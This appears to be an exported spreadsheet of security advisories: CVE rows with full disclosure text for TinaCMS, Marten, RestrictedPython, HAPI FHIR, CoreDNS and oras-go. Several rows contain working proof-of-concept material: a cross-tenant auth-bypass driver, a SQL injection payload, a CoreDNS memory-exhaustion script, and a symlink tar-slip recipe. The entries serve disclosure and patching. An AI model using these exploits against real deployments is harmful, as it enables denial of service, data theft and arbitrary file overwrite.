    media: ['victim/private/contract.pdf', 'victim/private/customers.csv'] }));
});
/* ===== driver ===== */
function call(clientID, token) {
  return new Promise((resolve) =&gt; {
    const r = http.request({ host: '127.0.0.1', port: VICTIM_PORT,
      path: `/api/cloudinary/media?clientID=${encodeURIComponent(clientID)}`,
      method: 'GET', headers: { authorization: token } }, (res) =&gt; {
      let b = ''; res.on('data', (c) =&gt; (b += c));
      res.on('end', () =&gt; resolve({ status: res.statusCode, body: b }));
    });
    r.on('error', (e) =&gt; resolve({ status: 0, body: String(e) })); r.end();
  });
}
(async () =&gt; {
  await new Promise((r) =&gt; identity.listen(IDENTITY_PORT, '127.0.0.1', r));
  await new Promise((r) =&gt; victim.listen(VICTIM_PORT, '127.0.0.1', r));
  const c1 = await call('victim-app', 'valid-token-for-victim-app');
  console.log('[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt;', c1.status, c1.body);
  const c2 = await call('victim-app', 'valid-token-for-attacker-app');
  console.log('[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt;', c2.status, c2.body);
  const atk = await call('attacker-app', 'valid-token-for-attacker-app');
  console.log('[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt;', atk.status, atk.body);
  const bug = c1.status === 200 &amp;&amp; c2.status === 401 &amp;&amp; atk.status === 200;
  console.log('\nVERDICT:', bug
    ? 'VULNERABLE — attacker authorized on victim site with credentials only for their own app.'
    : 'NOT REPRODUCED');
  identity.close(); victim.close();
  process.exit(bug ? 0 : 1);
})();
```
Output:
```
[CONTROL 1  legit victim user      ] clientID=victim-app   token=victim   -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
[CONTROL 2  attacker token, victim ] clientID=victim-app   token=attacker -&gt; 401 {"message":"sorry this user is unauthorized"}
[ATTACK     attacker own app+token ] clientID=attacker-app token=attacker -&gt; 200 {"authorized":true,"site":"victim-app","media":[...]}
VERDICT: VULNERABLE - attacker authorized on victim site with credentials only for their own app.
```
CONTROL 1 (200) shows the identity model is faithful, not a blanket allow. CONTROL 2 (401) shows the attacker cannot reach the victim's app with their own token. ATTACK (200) shows that naming their own app id, which their own token matches, passes the victim's gate and returns the victim's private media.
I verified the full chain in source at the audited commit and reproduced the code logic deterministically with the PoC above. I did not run the end-to-end attack against production `identity.tinajs.io` with two real accounts and a live deployment; that step needs two real accounts and a deployment. The one assumption it rests on, that `GET /v2/apps/&lt;attacker-app&gt;/currentUser` with the attacker's own token returns `200` + `verified:true`, is the normal behavior of an app owner's own session.
## Impact
An attacker with a free TinaCloud account reaches editor-level control of unrelated tenants:
- **Media handlers:** list and read media, upload arbitrary objects (`next-tinacms-dos` writes `ACL: public-read`, usable to host malware or phishing under the victim's CDN), and delete media by key.
- **`TinaCloudBackendAuthProvider` backend:** arbitrary GraphQL. Read every document, `createDocument` / `updateDocument` to deface or inject content that deploys to production, and `deleteDocument` to destroy content.
The attacker scripts requests with their own token and `clientID=&lt;own app&gt;` against known TinaCMS self-hosted endpoints, so it scales across deployments.
## Fix
Bind the decision to the site's own configured app id instead of the request value.
```diff
- export const isAuthorized = async (req: NextApiRequest) =&gt; {
-   const clientID = req.query.clientID;
-   const token = req.headers.authorization;
+ export const isAuthorized = async (req: NextApiRequest, expectedClientID?: string) =&gt; {
+   const requestClientID = req.query.clientID;
+   const token = req.headers.authorization;
+   const clientID = expectedClientID ?? process.env.NEXT_PUBLIC_TINA_CLIENT_ID;
+   if (expectedClientID &amp;&amp; requestClientID &amp;&amp; requestClientID !== expectedClientID) {
+     return undefined; // refuse a cross-tenant clientID
+   }
    if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
      return await isUserAuthorized({ clientID, token });
    }
    return undefined;
  };
```
Thread the site's configured `clientID` into `TinaCloudBackendAuthProvider()` and the media handler config, require `isUserAuthorized` to use it rather than `req.query.clientID`, apply the same change to `next-tinacms-azure/src/auth.ts`, and update the media-store READMEs so integrators stop reintroducing the request-driven `clientID`.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D257" s="5" t="inlineStr"/>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr">
        <is>
          <t>nuget:Marten</t>
        </is>
      </c>
      <c r="M257" s="5" t="inlineStr">
        <is>
          <t>9.13.0</t>
        </is>
      </c>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr"/>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Several code paths in Marten's LINQ provider and tenant-management internals interpolated a runtime, potentially attacker-influenced value into generated SQL as a single-quoted string literal without escaping or parameterization. A value containing a single quote (`'`) could break out of the literal and inject arbitrary SQL.
The primary vector is a `Dictionary&lt;,&gt;` indexer **key** used in a `Where` filter — `Where(x =&gt; x.Attributes[key] == v)` — a common "filter by attribute name" / EAV pattern. It is confirmed with an executed proof-of-concept and yields filter / multi-tenant authorization bypass (returning other tenants' rows) and blind data exfiltration. Where the application permits `;`-batched statements (Npgsql default), data modification is also possible.
## Affected sinks
- `Linq/Members/Dictionaries/DictionaryItemMember.cs` — dictionary indexer key (primary, confirmed PoC)
- `Linq/Members/Dictionaries/DictionaryContainsKeyFilter.cs` — `Dictionary.ContainsKey(key)` (Newtonsoft serializer only; System.Text.Json escapes the quote)
- `Linq/Parsing/SelectParser.cs` — a constant string projected through `Select(x =&gt; new { L = runtimeString })`
- `Internal/Operations/DeleteAllForTenant.cs` — tenant id reaching per-tenant projection teardown via `IEventStore.DeleteProjectionProgressAsync` (an in-code comment wrongly claimed the value was validated)
- `Schema/DatabaseScopedTenantPartitions.cs` — tenant id inlined into `FOR VALUES IN ('...')` partition DDL
- `Events/Daemon/Internals/EventLoader.cs` (defense-in-depth) — per-tenant partition-pruning literal
## Proof of concept (primary vector)
Benign: `x.Attributes["nonexistent-key"] == "v"` returns 0 rows. Attack: `x.Attributes["nonexistent' = '' or 1=1 --"] == "v"` returns all rows. Generated SQL:
```
select d.data from public.mt_doc_doc as d where d.data -&gt; 'Attributes' -&gt;&gt; 'x' or 1=1 --' = :p0;
```
## Fix
Each sink now escapes embedded single quotes (`.Replace("'", "''")`, mirroring the existing `Ordering.BuildNgramRankExpression`) or binds the value as a parameter (`DeleteAllForTenant`). Where a literal is retained for partition pruning, escaping preserves plan-time pruning while closing the injection. Regression tests lock down each vector.
## Workarounds
Until upgrading: do not pass untrusted input as a dictionary indexer key / `ContainsKey` argument / `Select` constant, nor as a tenant id into projection teardown or provisioning; and disable multi-statement command batching to limit blast radius.
## Credit
Reported privately and responsibly by an external security researcher with an executed PoC. Additional sinks found during the follow-up LINQ-wide audit.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76825</t>
        </is>
      </c>
      <c r="D258" s="5" t="inlineStr"/>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr">
        <is>
          <t>pip:RestrictedPython</t>
        </is>
      </c>
      <c r="M258" s="5" t="inlineStr">
        <is>
          <t>8.4</t>
        </is>
      </c>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr"/>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-470, CWE-680, CWE-693</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>### Impact
RestrictedPython could allow a sandbox escape when a policy exposes the standard library `string` module, or otherwise exposes `string.Formatter`, to restricted code.
`string.Formatter` field resolution methods such as `get_field` can perform attribute and item traversal internally and return live object references. This can bypass RestrictedPython's normal attribute guards and may allow access to sensitive objects such as function globals, builtins, file access, or code execution primitives.
Users are impacted if they run untrusted code with RestrictedPython and expose `string.Formatter`, directly or indirectly, for example through a custom import policy or globals.
### Patches
The problem has been patched by blocking access to `string.Formatter` and unsafe `string.Formatter` traversal methods in `safer_getattr`.
Users should upgrade to the patched release once available. Affected and patched version numbers should be filled in when the release is published.
### Workarounds
Do not expose the standard library `string` module or `string.Formatter` to restricted code.
If a custom import hook is used, deny imports of `string` or provide only a restricted wrapper that does not expose `Formatter`. If custom globals are supplied, ensure neither `string.Formatter` nor `Formatter` instances are available to restricted code.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D259" s="5" t="inlineStr"/>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M259" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr"/>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SHCParser` inflates compressed Smart Health Card JWT payloads into memory without a decompressed-size limit. An attacker who can submit SHC content for validation can craft a small compressed JWT payload that expands to a very large byte array, causing memory exhaustion or severe garbage collection pressure.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` checks `MAX_ALLOWED_SHC_LENGTH`, but this only logs an error and parsing continues:
```java
// SHCParser.java:282-284
if (jwt.length() &gt; MAX_ALLOWED_SHC_LENGTH) {
  logError(...);
}
```
If the header contains `"zip":"DEF"`, the payload is inflated before JSON parsing:
```java
// SHCParser.java:300-304
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
res.payload = JsonParser.parseObject(FileUtilities.bytesToString(payloadJson), true);
```
`inflate()` accumulates all decompressed output in a `ByteArrayOutputStream` and has no maximum output size:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
return outputStream.toByteArray();
```
The same unbounded decompression pattern exists in `decompress()` at `SHCParser.java:410-423`.
### PoC
Create a highly compressible SHC-shaped JSON payload, compress it with raw DEFLATE (`new Deflater(9, true)`), Base64URL-encode it as the JWT payload, and set the JWT header to `{"zip":"DEF"}`.
Local verification measured the following expansion through `SHCParser.inflate()`:
```text
plain=1000066 compressed=1052 inflated=1000066 ratio=950
plain=16000066 compressed=15626 inflated=16000066 ratio=1023
```
A small compressed payload can therefore allocate many megabytes of heap. Larger payloads can trigger `OutOfMemoryError` or process instability.
### Impact
This is a denial-of-service vulnerability. Any validator service or application that accepts attacker-supplied SHC content can be forced to allocate excessive heap memory. Impact ranges from request failure and severe GC pressure to process termination.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D260" s="5" t="inlineStr"/>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M260" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr"/>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed Smart Health Card (SHC) JWT with `zip: "DEF"` and an empty or truncated DEFLATE payload causes `SHCParser.inflate()` to loop forever. This allows an attacker who can submit SHC content for validation to pin a JVM worker thread indefinitely, causing denial of service.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` inflates the JWT payload when the header contains `"zip":"DEF"`:
```java
// SHCParser.java:300-302
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
```
`inflate()` loops only on `!inflater.finished()` and does not check `inflater.needsInput()`, `inflater.needsDictionary()`, or zero-progress output:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
```
For empty or truncated raw DEFLATE input, `Inflater.inflate()` returns `0`, `finished()` remains `false`, and `needsInput()` becomes `true`, producing an infinite tight loop. The same unsafe loop pattern also exists in `decompress()` at `SHCParser.java:410-423`.
The validator reaches this path during SHC validation and during file-format detection for SHC-looking input (`ResourceChecker.java:115-118`).
### PoC
Compile the project, then run a minimal local harness that calls:
```java
SHCParser.inflate(new byte[0]);
```
This never returns. Local verification:
```bash
timeout 3s java -cp ... VerifyDoSFindings shcHang
echo $?
# 124 = timeout killed the hung process
```
A JWT PoC uses:
- header: Base64URL(`{"zip":"DEF"}`)
- payload: empty or truncated raw DEFLATE bytes
- signature: arbitrary
Submit the resulting token as SHC content, for example via a `.shc` file or content beginning with `shc:/` that reaches the validator's SHC detection path.
### Impact
This is a denial-of-service vulnerability. A single malformed SHC validation request can consume a worker thread indefinitely. In services that validate uploaded SHC content, a small number of concurrent malformed requests can exhaust all validation workers.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D261" s="5" t="inlineStr"/>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M261" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr"/>
      <c r="P261" s="5" t="inlineStr"/>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS parses attacker-controlled DNS section counts before validating them on DNS-over-HTTPS (DoH and DoH3), DNS-over-QUIC (DoQ), and DNS-over-gRPC listeners. An unauthenticated client can use DNS name compression to make one
65,533-byte request allocate more than 10 MiB while it is unpacked. Concurrent requests can exhaust memory and terminate CoreDNS.
### Details
The affected request paths call `dns.Msg.Unpack` directly:
- [DoH POST and GET decoding](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155). DoH3 uses the same decoder.
- [DoQ stream handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219).
- [DNS-over-gRPC query handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184).
This differs from the [miekg/dns](https://github.com/miekg/dns) UDP and TCP server. Its [`serveDNS`](https://github.com/miekg/dns/blob/v1.1.72/server.go#L628-L643) path decodes the fixed 12-byte header and invokes [`DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) before unpacking the DNS sections. The default policy rejects requests unless `QDCOUNT` is exactly one and also limits the other section counts. CoreDNS's custom transports bypass this early validation.
Parsing happens before the plugin chain. Plugin-level rate limiting or request handling cannot prevent the allocation. The fix is to apply `dns.DefaultMsgAcceptFunc` to the fixed header before calling `Msg.Unpack` in each custom request transport. Response decoding must remain separate because the request policy intentionally rejects response headers.
### PoC
The PoC runs against the DoH server.
Run the following from a clean checkout of CoreDNS v1.14.6. Docker must support container memory limits. The example uses the test certificate already present in the repository and publishes the test service only on loopback.
Save this as `Corefile.cd01`:
```text
https://.:8053 {
    tls /cert.pem /key.pem
    whoami
}
```
Save this standard-library client as `poc-cd01.py`:
```python
#!/usr/bin/env python3
import argparse
import concurrent.futures
from collections import Counter
import http.client
import ssl
import struct
def normal_query():
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x07example\x03org\x00" + struct.pack("!HH", 1, 1)
    return header + question, 1
def attack_query():
    message = bytearray(65535)
    offset = 12
    name_offset = offset
    for size in (63, 63, 63, 61):
        message[offset] = size
        offset += 1
        message[offset : offset + size] = b"\x01" * size
        offset += size
    message[offset] = 0
    offset += 1
    struct.pack_into("!HH", message, offset, 1, 1)
    offset += 4
    questions = 1
    while offset + 6 &lt;= len(message):
        struct.pack_into("!HHH", message, offset, 0xC000 | name_offset, 1, 1)
        offset += 6
        questions += 1
    struct.pack_into(
        "!HHHHHH", message, 0, 0x1234, 0x0100, questions, 0, 0, 0
    )
    return bytes(message[:offset]), questions
def send(payload):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(
        "127.0.0.1", 18053, timeout=3, context=context
    )
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        response.read()
        return f"http-{response.status}"
    except Exception:
        return "error"
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--normal", action="store_true")
    parser.add_argument("--workers", type=int, default=1)
    args = parser.parse_args()
    payload, questions = normal_query() if args.normal else attack_query()
    print(
        f"payload={len(payload)} questions={questions} workers={args.workers}"
    )
    with concurrent.futures.ThreadPoolExecutor(args.workers) as pool:
        results = pool.map(send, [payload] * args.workers)
    print(Counter(results))
if __name__ == "__main__":
    main()
```
Build the Linux binary and container image:
```sh
GOCACHE=/tmp/coredns-gocache \
GOOS=linux GOARCH="$(go env GOARCH)" CGO_ENABLED=0 \
go build -tags=grpcnotrace -o coredns .
docker build --tag coredns-cd01:vulnerable .
```
Start CoreDNS with a 64 MiB memory and swap limit:
```sh
docker run --detach --name coredns-cd01 \
  --memory 64m --memory-swap 64m \
  --publish 127.0.0.1:18053:8053/tcp \
  --volume "$PWD/Corefile.cd01:/Corefile:ro" \
  --volume "$PWD/plugin/tls/test_cert.pem:/cert.pem:ro" \
  --volume "$PWD/plugin/tls/test_key.pem:/key.pem:ro" \
  coredns-cd01:vulnerable -conf /Corefile
```
Confirm that the listener works and that one malicious request is accepted:
```console
$ python3 poc-cd01.py --normal
payload=29 questions=1 workers=1
Counter({'http-200': 1})
$ python3 poc-cd01.py
payload=65533 questions=10878 workers=1
Counter({'http-200': 1})
```
Send 32 malicious requests concurrently and inspect the container:
```console
$ python3 poc-cd01.py --workers 32
payload=65533 questions=10878 workers=32
Counter({'error': 32})
$ docker inspect --format '{{.State.Status}} OOMKilled={{.State.OOMKilled}} ExitCode={{.State.ExitCode}}' coredns-cd01
exited OOMKilled=true ExitCode=137
```
`OOMKilled=true` confirms that the container was terminated by memory exhaustion rather than a CoreDNS configuration error.
### Impact
This is an unauthenticated denial-of-service vulnerability. Deployments are affected when DoH, DoH3, DoQ, or DNS-over-gRPC is exposed to an attacker. The ordinary miekg/dns UDP and TCP listeners are not affected because they perform the header acceptance check before unpacking.
In the validated configuration, 32 requests OOM-killed a CoreDNS container limited to 64 MiB. Higher memory limits increase the number of concurrent requests required but do not remove the allocation amplification. Successful exploitation interrupts DNS service.
CoreDNS versions v007 through v1.14.6 are affected when DNS-over-gRPC is exposed. DoH is affected from v1.1.3, DoQ from v1.11.0, and DoH3 from v1.13.2.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D262" s="5" t="inlineStr"/>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M262" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr"/>
      <c r="P262" s="5" t="inlineStr"/>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `content/file.Store` in oras-go v2 unpacks OCI layer tarballs when a descriptor carries `io.deis.oras.content.unpack=true`. The extraction routine validates symlink targets purely lexically (`filepath.Join`) and, for regular files placed directly at the extraction root, skips the parent-symlink `Lstat` walk. A malicious tarball can plant a chain of symlinks whose lexical target stays inside the extraction root but whose kernel-resolved target is any absolute path, then write through it with a follow-up regular-file entry. The result is arbitrary file create/overwrite outside the store's working directory under the default `AllowPathTraversalOnWrite=false` configuration — a canonical tar-slip → RCE primitive.
### Details
**Affected versions:** `&lt;= v2.6.1`
**Entry point:** `content/file/file.go` line 486, `(*Store).pushDir` — reached from `(*Store).Push` for any descriptor whose annotations include `io.deis.oras.content.unpack: "true"` (i.e. `file.AnnotationUnpack`) and an `org.opencontainers.image.title`. `oras.Copy` from a remote registry into a `file.New(dir)` store invokes this per layer.
**Root cause 1 — lexical link validation.** `content/file/utils.go` lines 264–275, `ensureLinkPath`:
```go
func ensureLinkPath(baseAbs, baseRel, link, target string) (string, error) {
        // resolve link
        path := target
        if !filepath.IsAbs(target) {
                path = filepath.Join(filepath.Dir(link), target)
        }
        // ensure path is under baseAbs or baseRel
        if _, err := resolveRelToBase(baseAbs, baseRel, path); err != nil {
                return "", err
        }
        return target, nil
}
```
`filepath.Join` cleans `..` components textually and does **not** dereference symlinks in intermediate components. It therefore cannot detect that a component of `target` is itself a previously-extracted symlink that the kernel will follow before applying subsequent `..` components.
**Root cause 2 — parent-symlink check skipped for root-level entries.** `content/file/utils.go` lines 247–257, inside `resolveRelToBase`:
```go
// No symbolic link allowed in the relative path
dir := filepath.Dir(path)
for dir != "." {
        if info, err := os.Lstat(filepath.Join(baseAbs, dir)); err != nil {
                ...
        } else if info.Mode()&amp;os.ModeSymlink != 0 {
                return "", fmt.Errorf("no symbolic link allowed between %q and %q", baseRel, target)
        }
        dir = filepath.Dir(dir)
}
```
For an entry named `&lt;title&gt;/escape`, `path == "escape"` and `filepath.Dir("escape") == "."`, so the loop body never executes — the entry itself is never `Lstat`-checked.
**Root cause 3 — write follows symlinks.** `content/file/utils.go` line 279, `writeFile`:
```go
file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
```
No `O_NOFOLLOW`, so if `path` is a symlink the write goes to its target.
**Data flow / exploit construction.** Let `baseAbs = &lt;workingDir&gt;/&lt;title&gt;` and `N = depth(baseAbs)` (number of path components from `/`). The attacker's tar.gz contains, in order:
1. `N` nested directories `&lt;title&gt;/d0/d1/…/d{N-1}`.
2. A symlink `&lt;title&gt;/d0/…/d{N-1}/up` → `"../../…"` (`N` levels). Both lexically and on disk this resolves to `baseAbs`, so `ensureLinkPath` accepts it and `resolveRelToBase` sees only real directories in its ancestry.
3. A symlink `&lt;title&gt;/escape` → `"d0/…/d{N-1}/up/../../…/&lt;absTarget&gt;"` (`N` `..` components after `up`). **Lexically**, `filepath.Join(baseAbs, "d0/…/up/../…/&lt;absTarget&gt;")` cancels the `N` `..` against `up` plus `d{N-2}…d0`, yielding `baseAbs/d0/&lt;absTarget&gt;` — inside the root, so `ensureLinkPath` accepts it. `resolveRelToBase` then walks `d0/&lt;absTarget-parents&gt;`, none of which are symlinks (they don't exist), so the link is created. **At the kernel**, resolving `baseAbs/d0/…/up` first follows `up` back to `baseAbs`, and the remaining `N` `..` components climb from `baseAbs` to `/`, then `&lt;absTarget&gt;` is appended — the symlink points at the attacker-chosen absolute path.
4. A regular file `&lt;title&gt;/escape` (same name). `resolveRelToBase("escape")` yields `dir == "."` (root cause 2), so no `Lstat` is performed. `extractTarDirectory` (line 181) calls `writeFile` which opens `baseAbs/escape` with `O_TRUNC` and no `O_NOFOLLOW` (root cause 3), writing the attacker's payload through the symlink to `&lt;absTarget&gt;`.
